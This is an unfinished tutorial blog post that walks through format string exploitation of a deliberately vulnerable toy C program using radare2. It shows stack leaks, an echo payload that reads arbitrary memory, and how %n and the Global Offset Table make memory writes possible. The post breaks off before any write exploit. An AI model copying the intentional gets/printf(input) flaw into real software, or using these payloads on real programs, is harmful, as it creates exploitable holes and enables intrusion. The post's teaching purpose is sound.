Format String Exploitation 00: testGOTwrite
POST STILL UNDER CONSTRUCTION
In an effort to better understand format string exploitation, I constructed the following trivial example and decided to write a walkthrough for it.
This example is ideal for those of you who are just getting into exploitation and want to see how a simple format string exploit works.
Consider the following example:
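#include <stdio.h>
#include <stdlib.h>

/* Never called by the program itself; reaching it is our goal. */
void victory(){
    printf("Somehow you've won...\n");
}

void printStuff(){
    char input[100];
    gets(input);    /* deliberately unsafe: no bounds check */
    printf(input);  /* the bug: user input is used as the format string */
}

int main(){
    printStuff();
    exit(0);
}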
If you've never abused printf() in the way I'm about to show you, it is not immediately obvious how the above program can have its execution flow redirected with printf(). Our first goal will be to call the victory() function. However, generalizing the technique can lead to arbitrary code execution, like executing /bin/sh.
Even though a buffer overflow exploit is still possible, we're assuming for the sake of example that we can't use stack-smashing.
We can compile this program using:
-> % /usr/bin/gcc -no-pie ./testGOTwrite.c -o testGOTwrite
The -no-pie switch disables building a Position-Independent Executable (PIE), which is essentially what lets ASLR apply to the text and data sections of the binary itself.
I've disabled it because exploitation is harder with it on, and PIE seems to be becoming the default on most Linux distros.
If you'd like to use the provided sample exploit, you can download all the necessary files here: testGOTwrite.7z. If you compile the program yourself, the provided payload most likely won't work as-is and will have to be modified so that the addresses line up.
Now that we have the binary in hand, run it and see what happens:
-> % ./testGOTwrite
HERPDERP
HERPDERP%
-> % ./testGOTwrite
%lx.%lx.%lx.%lx.
252e786c252e786c.7fce2b371710.7fce2b36f860.b46271.
Notice that on the first invocation the input string is merely echoed back to you, while on the second some strange numbers appear in place of each %lx. The data being printed is in fact register and stack data. To see what is happening in greater detail, let's fire up radare2:
-> % r2 -d ./testGOTwrite
Process with PID 24550 started...
= attach 24550 24550
bin.baddr 0x00400000
Using 0x400000
asm.bits 64
-- Everybody hates warnings. Mr. Pancake, tear down this -Wall
[0x7fd35b9d4f30]>
After loading the binary, we use aaa to analyze all functions:
[0x7fd35b9d4f30]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
TODO: esil-vm not initialized
[Cannot determine xref search boundariesr references (aar)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
ptrace (PT_ATTACH): Operation not permitted
= attach 24550 24550
Followed by seeking (s) to our printStuff() function and setting a breakpoint (db) on its call to printf():
[0x7fd35b9d4f30]> s sym.printStuff
[0x004006dd]> pdf
/ (fcn) sym.printStuff 80
| sym.printStuff ();
| ; var int local_70h @ rbp-0x70
| ; var int local_8h @ rbp-0x8
| ; CALL XREF from 0x00400736 (sym.main)
| 0x004006dd 55 push rbp
| 0x004006de 4889e5 mov rbp, rsp
| 0x004006e1 4883ec70 sub rsp, 0x70 ; 'p'
| 0x004006e5 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40
| 0x004006ee 488945f8 mov qword [local_8h], rax
| 0x004006f2 31c0 xor eax, eax
| 0x004006f4 488d4590 lea rax, qword [local_70h]
| 0x004006f8 4889c7 mov rdi, rax
| 0x004006fb b800000000 mov eax, 0
| 0x00400700 e8bbfeffff call sym.imp.gets ; char*gets(char *s)
| 0x00400705 488d4590 lea rax, qword [local_70h]
| 0x00400709 4889c7 mov rdi, rax
| 0x0040070c b800000000 mov eax, 0
| 0x00400711 e89afeffff call sym.imp.printf ; int printf(const char *format)
| 0x00400716 90 nop
| 0x00400717 488b45f8 mov rax, qword [local_8h]
| 0x0040071b 644833042528. xor rax, qword fs:[0x28]
| ,=< 0x00400724 7405 je 0x40072b
| | 0x00400726 e875feffff call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
| `-> 0x0040072b c9 leave
\ 0x0040072c c3 ret
[0x004006dd]> db 0x00400711
We're now poised to run the program, provide our input, and see what the stack looks like just before printf() is called:
[0x004006dd]> dc
%lx.%lx.%lx.%lx.
hit breakpoint at: 400711
[0x004006dd]> pd 8 @ 0x004006f4
| 0x004006f4 488d4590 lea rax, qword [local_70h]
| 0x004006f8 4889c7 mov rdi, rax
| 0x004006fb b800000000 mov eax, 0
| 0x00400700 e8bbfeffff call sym.imp.gets ; char*gets(char *s)
| 0x00400705 488d4590 lea rax, qword [local_70h]
| 0x00400709 4889c7 mov rdi, rax
| 0x0040070c b800000000 mov eax, 0
| ;-- rip:
| 0x00400711 b e89afeffff call sym.imp.printf ; int printf(const char *format)
After supplying the input string %lx.%lx.%lx.%lx. we use the pd 8 @ 0x004006f4 command to print the 8 instructions running from just before the gets call up to the printf call. Since this is a 64-bit binary, the ABI specifies that function arguments are passed via the registers rdi, rsi, rdx, rcx, r8, r9, in that order. Additional arguments are passed via the stack, as on 32-bit x86.
This is important to keep in mind, since we are going to take advantage of this property of the calling convention to interpret the printf() output.
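As a rough sketch of that convention, the helper below maps the n-th conversion specifier in a format string to the place printf() reads its value from. The function name printf_arg_source is made up for this post, and it assumes every specifier consumes exactly one integer or pointer argument (no floating point, no positional arguments).

```c
#include <assert.h>
#include <stddef.h>

/* Integer/pointer argument registers of the System V AMD64 ABI, in order. */
static const char *const ARG_REGS[6] = { "rdi", "rsi", "rdx", "rcx", "r8", "r9" };

/*
 * Hypothetical helper (not part of any library): where does printf() fetch
 * the value for the n-th conversion specifier (1-based)?
 *
 * rdi carries the format string itself, so specifier 1 reads rsi.
 * Returns the register name, or NULL once the registers are exhausted; in
 * that case *stack_slot is the 0-based 8-byte slot counted from rsp at the
 * moment of the call instruction.
 */
static const char *printf_arg_source(unsigned n, unsigned *stack_slot)
{
    assert(n >= 1 && stack_slot != NULL);
    *stack_slot = 0;
    if (n <= 5)
        return ARG_REGS[n];   /* specifiers 1..5 -> rsi, rdx, rcx, r8, r9 */
    *stack_slot = n - 6;      /* specifier 6 reads [rsp], 7 reads [rsp+8], ... */
    return NULL;
}
```

For the four-specifier input used here, the helper reports rsi, rdx, rcx, and r8; a sixth specifier would be the first one to read from the stack.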
If we look at the disassembly above, we can see that the local stack variable labeled local_70h (an rbp-based variable: rbp - 0x70) is where our string is being stored. In the source code, this is the char input[100]; variable.
Since the ABI specifies that the rdi register is used for arg0 in function calls, it's easy to see that both gets() and printf() are using this variable as their first argument. And just for completeness, here are the signatures for both these functions (from man 3 gets and man 3 printf respectively):
char *gets(char *s);
int printf(const char *format, ...);
Lastly, before we continue through the print in r2, here is what the stack and registers look like:
[0x004006dd]> pxq rbp - rsp + 0x8 @ rsp
0x7ffdd9f47300 0x2e786c252e786c25 0x2e786c252e786c25 %lx.%lx.%lx.%lx.
0x7ffdd9f47310 0x0000000000000000 0x0000000000f0b5ff ................
0x7ffdd9f47320 0x00000000000000c2 0x00007ffdd9f47356 ........Vs......
0x7ffdd9f47330 0x0000000000000001 0x00007fd35b6bdd35 ........5.k[....
0x7ffdd9f47340 0x0000000000000001 0x000000000040079d ..........@.....
0x7ffdd9f47350 0x0000000000000000 0x0000000000000000 ................
0x7ffdd9f47360 0x0000000000400750 0x1644fb0214813500 P.@......5....D.
0x7ffdd9f47370 0x00007ffdd9f47380 .s......
[0x004006dd]> dr~rdi,rsi,rdx,rcx,r8,r9,rsp,rbp
rcx = 0x7fd35b9ce860
rdx = 0x7fd35b9d0710
r8 = 0x0177e271
r9 = 0x00000000
rsi = 0x252e786c252e786c
rdi = 0x7ffdd9f47300
rsp = 0x7ffdd9f47300
rbp = 0x7ffdd9f47370
If you take a look at the first line of the stack dump above, you should notice that at the top of the stack (0x7ffdd9f47300) we have some familiar looking output. Since this is our input variable, the address of this stack variable should be in the rdi register, which we can see is true from the register dump above.
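The reason printf() prints these values is that it fetches one argument for every conversion specifier it encounters, whether or not the caller actually supplied one. On x86-64 it first consumes rsi, rdx, rcx, r8, and r9 (rdi holds the format string itself) and only then starts walking the stack. With four %lx. specifiers we therefore get the contents of rsi, rdx, rcx, and r8: compare the register dump above with the program output from the earlier run (the exact values differ between runs, but the pattern is the same). Since each specifier is followed by a dot, the printed words are dot-delimited, making the program output easy to read.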
Note that when running a program which expects stdin and stdout in radare2, it's not always possible to see the program's output on the command line.
This is a prime reason to use stream redirection to redirect the program's stdin, stdout, or both to another terminal interface. (See "Debugging a Program by Redirecting IO to Another Terminal")
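Something to notice is that in the stack output printed above, we can actually see our original format string, also on the stack, starting at address 0x7ffdd9f47300 (a pointer to which is passed to printf() in rdi). This is both interesting and important. What happens if we supply enough format specifiers to reach our original input string?
Note that the rest of the output in this post comes from a 32-bit build of the same program (hence the 0x0804.... addresses and 4-byte words), where printf() takes all of its arguments from the stack.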
Observe:
-> % ./testGOTwrite
AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x
AAAA1.f77848f8.f75eceb3.fff9770a.0.f7769830.41414141.252e7825.78252e78
Here we've prefixed our input string with four A's to make it easier to see when we've reached our input string on the stack. Since the hexadecimal representation of A is 0x41, we can see that this is the 7th word on the stack. printf() gives us a direct addressing notation that lets us skip the first 6 words on the stack:
-> % ./testGOTwrite
AAAA%7$x
AAAA41414141
By inserting a 7$ between the % and x, we were able to tell printf() that we wanted to directly reference the 7th stack word as the argument for this format specifier. Well, how is this useful?
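For reference, here is what the n$ notation looks like when it is used legitimately, with real arguments behind it. This is a small sketch (pick_by_position is a made-up name); the n$ syntax is a POSIX extension that glibc supports, not part of ISO C.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical demo: the three values are passed in one order, but the
 * format string selects them by position, starting with the third.
 */
static int pick_by_position(char *out, size_t out_len)
{
    assert(out != NULL);
    return snprintf(out, out_len, "%3$x.%1$x.%2$x",
                    0x11111111u, 0x22222222u, 0x41414141u);
}
```

With a large enough buffer this produces 41414141.11111111.22222222. In the exploit the idea is the same, except that no arguments were ever passed, so the "7th argument" is simply whatever occupies that slot on the stack.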
Whereas many of the format specifiers for printf() interpret their arguments as immediate values (simply printing text), there are two notable exceptions which treat the argument as a pointer: %s and %n.
The %s format specifier dereferences the argument in an attempt to print the string/characters at the specified memory address. Can you see where I'm going with this?
Let's try it:
-> % ./testGOTwrite
%s
[1] 20278 segmentation fault (core dumped) ./testGOTwrite
Hmm, a SEGFAULT. What went wrong? Well, looking back at our output above, the first word printf() picks up is 0x1, which is not a mapped memory address. So when printf() attempts to dereference 0x1, the program crashes. Let's try again, but with a valid memory address.
Read memory primitive
We'll use rabin2 to get main's memory address, then use echo to write that memory address in little-endian format before our format string:
-> % rabin2 -M ./testGOTwrite
[Main]
vaddr=0x080484db paddr=0x000004db
-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite
ۄ�L$����q�U��Q���������
j%
-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite | xxd
00000000: db84 0408 8d4c 2404 83e4 f0ff 71fc 5589 .....L$.....q.U.
00000010: e551 83ec 04e8 c3ff ffff 83ec 0c6a .Q...........j
From the output above, we can see that the first time we try running testGOTwrite we get a bunch of gibberish. The gibberish, when viewed through the lens of xxd however, is revealed to be a sequence of bytes. We can see the first four bytes db84 0408 are the same as what we entered. But what about the bytes that follow? Well, since we chose main's memory address, we should expect to see the bytecode at the start of main. Back in radare2:
[0xf7711bd0]> s main
[0x080484db]> pd 10
;-- main:
0x080484db 8d4c2404 lea ecx, dword [esp + 4] ; 0x4 ; 4
0x080484df 83e4f0 and esp, 0xfffffff0
0x080484e2 ff71fc push dword [ecx - 4]
0x080484e5 55 push ebp
0x080484e6 89e5 mov ebp, esp
0x080484e8 51 push ecx
0x080484e9 83ec04 sub esp, 4
0x080484ec e8c3ffffff call sym.printStuff
0x080484f1 83ec0c sub esp, 0xc
0x080484f4 6a00 push 0
Lo and behold, we have hijacked printf() to be able to read any mapped memory of the running process! Look at the middle column for the instruction bytecode, and compare it with the xxd output above (starting after the db84 0408 with 8d4c...). Notice that the bytes stopped only when a 00 was reached, the normal string terminator.
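The payload passed to echo above can also be assembled programmatically. Below is a minimal sketch for the 32-bit case, where build_read_payload is a hypothetical helper written for this post: it lays the target address down as four little-endian bytes and appends a positional %s that points back at them.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Hypothetical helper: writes "<addr as 4 little-endian bytes>%<index>$s"
 * into out and returns the payload length, or 0 if it does not fit.
 * index is the stack word at which our own input begins (7 in this post).
 */
static size_t build_read_payload(uint32_t addr, unsigned index,
                                 unsigned char *out, size_t out_len)
{
    assert(out != NULL);
    if (out_len < 5)
        return 0;
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(addr >> (8 * i));   /* least significant byte first */
    /* "%%" emits a literal '%', "%u" the index, and "$s" is copied as-is. */
    int n = snprintf((char *)out + 4, out_len - 4, "%%%u$s", index);
    if (n < 0 || (size_t)n >= out_len - 4)
        return 0;
    return 4 + (size_t)n;
}
```

Calling it with 0x080484db and index 7 gives the same 8 bytes as the echo command: db 84 04 08 followed by %7$s. One caveat with this approach: an address containing a 00 byte would end the format string early, and one containing 0a would cut the input short in gets(), so not every address can be embedded this way.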
Now, being able to read memory is pretty great. We can use this, for instance, to leak data from the Global Offset Table, which we use in the time_is challenge solution. But for this example printf() exploit, we only need to write data.
Enter the Drago%n
As mentioned earlier, the %n specifier is similar to %s in that its argument is treated as a pointer rather than an immediate value. Where it differs though is that instead of reading from the address, it writes to it: the number of characters printed so far is stored at that address.
Let that sink in.
printf() can write data to memory.
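Here is %n doing its job in a well-behaved program, as a sketch (count_after_padding is a name invented for this post). The field width controls how many characters get printed before %n is reached, and therefore which value ends up being written.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical demo: print a single number padded to `width` characters,
 * then let %n store the running character count into `written`.
 */
static int count_after_padding(int width)
{
    char scratch[256];
    int written = -1;
    assert(width >= 1 && width < (int)sizeof scratch);
    snprintf(scratch, sizeof scratch, "%*d%n", width, 0, &written);
    return written;
}
```

count_after_padding(4) returns 4 and count_after_padding(100) returns 100. In the exploit, the pointer handed to %n is not a legitimate variable like written but an address we planted in our own input.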
Let's try it out. First, we'll use radare2 to look at the memory map to see what's writable:
[0x080484b4]> dm
sys 4K 0x08048000 * 0x08049000 s -r-x /testGOTwrite /testGOTwrite ; map._testGOTwrite._r_x
sys 4K 0x08049000 - 0x0804a000 s -r-- /testGOTwrite /testGOTwrite ; map._testGOTwrite._rw_
sys 4K 0x0804a000 - 0x0804b000 s -rw- /testGOTwrite /testGOTwrite ; obj._GLOBAL_OFFSET_TABLE_
sys 1.7M 0xf755a000 - 0xf7713000 s -r-x /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 4K 0xf7713000 - 0xf7714000 s ---- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 8K 0xf7714000 - 0xf7716000 s -r-- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 4K 0xf7716000 - 0xf7717000 s -rw- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so ; edi
sys 12K 0xf7717000 - 0xf771a000 s -rw- unk0 unk0
sys 8K 0xf7767000 - 0xf7769000 s -rw- unk1 unk1
sys 8K 0xf7769000 - 0xf776b000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys 8K 0xf776b000 - 0xf776d000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 136K 0xf776d000 - 0xf778f000 s -r-x /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._r_x
sys 4K 0xf7790000 - 0xf7791000 s -r-- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._rw_
sys 4K 0xf7791000 - 0xf7792000 s -rw- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so
sys 132K 0xff808000 - 0xff829000 s -rw- [stack] [stack] ; map._stack_._rw_
The third line of the map above shows that the memory region 0x804a000 - 0x804b000 is writable. First, let's look at it and see what it is:
[0x080484b4]> s 0x804a000
[0x0804a000]> pd 10
;-- section_end..got:
;-- section..got.plt:
;-- section_end.GNU_RELRO:
;-- _GLOBAL_OFFSET_TABLE_:
0x0804a000 149f adc al, 0x9f ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
0x0804a002 0408 add al, 8
0x0804a004 0000 add byte [eax], al
0x0804a006 0000 add byte [eax], al
0x0804a008 0000 add byte [eax], al
0x0804a00a 0000 add byte [eax], al
;-- reloc.printf_12:
0x0804a00c .dword 0x08048346 ; RELOC 32 printf
;-- reloc.gets_16:
0x0804a010 .dword 0x08048356 ; RELOC 32 gets
;-- reloc.puts_20:
0x0804a014 .dword 0x08048366 ; RELOC 32 puts
;-- reloc.exit_24:
0x0804a018 .dword 0x08048376 ; RELOC 32 exit
This here is the Global Offset Table!
Got GOT?
So what is this fabled Global Offset Table anyway? Well, I could go into a very lengthy and technical explanation, but this blog post goes into the nitty-gritty pretty well. At a very high level, the GOT and PLT work together to dynamically resolve shared library functions at runtime. We can illustrate this like so:
[0x0804a000]> ood
Wait event received by different pid 22602
Process with PID 23143 started...
File dbg:///testGOTwrite reopened in read-write mode
= attach 23143 23143
Assuming filepath /testGOTwrite
[0xf77c9bd0]> s 0x0804a000
[0x0804a000]> pd 11
;-- section_end..got:
;-- section..got.plt:
;-- section_end.GNU_RELRO:
;-- _GLOBAL_OFFSET_TABLE_:
0x0804a000 149f adc al, 0x9f ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
0x0804a002 0408 add al, 8
0x0804a004 0000 add byte [eax], al
0x0804a006 0000 add byte [eax], al
0x0804a008 0000 add byte [eax], al
0x0804a00a 0000 add byte [eax], al
;-- reloc.printf_12:
0x0804a00c .dword 0x08048346 ; RELOC 32 printf
;-- reloc.gets_16:
0x0804a010 .dword 0x08048356 ; RELOC 32 gets
;-- reloc.puts_20:
0x0804a014 .dword 0x08048366 ; RELOC 32 puts
;-- reloc.exit_24:
0x0804a018 .dword 0x08048376 ; RELOC 32 exit
;-- reloc.__libc_start_main_28:
0x0804a01c .dword 0x08048386 ; RELOC 32 __libc_start_main
The ood command causes radare2 to re-open the binary, which places us at 0xf77c9bd0, before even the entry point and definitely way before main() is called. So we see here that the addresses stored for each of these imported functions start at 0x8048346 and are spaced 16 bytes apart. Something to notice is that these addresses fall in the .plt section of the binary:
[0x0804a000]> iS~80483
idx=11 vaddr=0x08048308 paddr=0x00000308 sz=35 vsz=35 perm=--r-x name=.init
idx=12 vaddr=0x08048330 paddr=0x00000330 sz=96 vsz=96 perm=--r-x name=.plt
idx=13 vaddr=0x08048390 paddr=0x00000390 sz=8 vsz=8 perm=--r-x name=.plt.got
idx=14 vaddr=0x080483a0 paddr=0x000003a0 sz=450 vsz=450 perm=--r-x name=.text
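If the interplay between the two tables feels abstract, a toy model in plain C may help. This is only an analogy under simplifying assumptions, not how the dynamic linker is actually implemented, and every name in it is made up: a single writable function pointer plays the GOT entry, and a wrapper that always calls through it plays the PLT stub.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*fn_t)(void);

static int lazy_resolver(void);

static int fake_libc_exit(void) { return 1; }   /* stands in for the real exit() */
static int fake_victory(void)   { return 42; }  /* stands in for victory() */

/* Toy GOT entry: writable, and initially pointing at the resolver. */
static fn_t toy_got_exit = lazy_resolver;
static int resolver_runs = 0;

/* First call only: look the function up, patch the entry, then call it. */
static int lazy_resolver(void)
{
    resolver_runs++;
    toy_got_exit = fake_libc_exit;
    return toy_got_exit();
}

/* Toy PLT stub: callers never call the target directly, only via the entry. */
static int toy_plt_exit(void)
{
    assert(toy_got_exit != NULL);
    return toy_got_exit();
}
```

The first toy_plt_exit() call goes through the resolver and returns 1; later calls skip the resolver. If anything overwrites toy_got_exit with fake_victory, the very same call returns 42 instead, which is the effect a write into the writable region above would have on the real table.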
Let's look at what is stored at the entry for __libc_start_main:
[0x0804a000]> pd 2 @ 0x8048386
| 0x08048386 6820000000 push 0x20 ; 32
`=< 0x0804838b e9a0ffffff jmp 0x8048330
Hmm, so we just push 0x20 onto the stack and
POST STILL UNDER CONSTRUCTION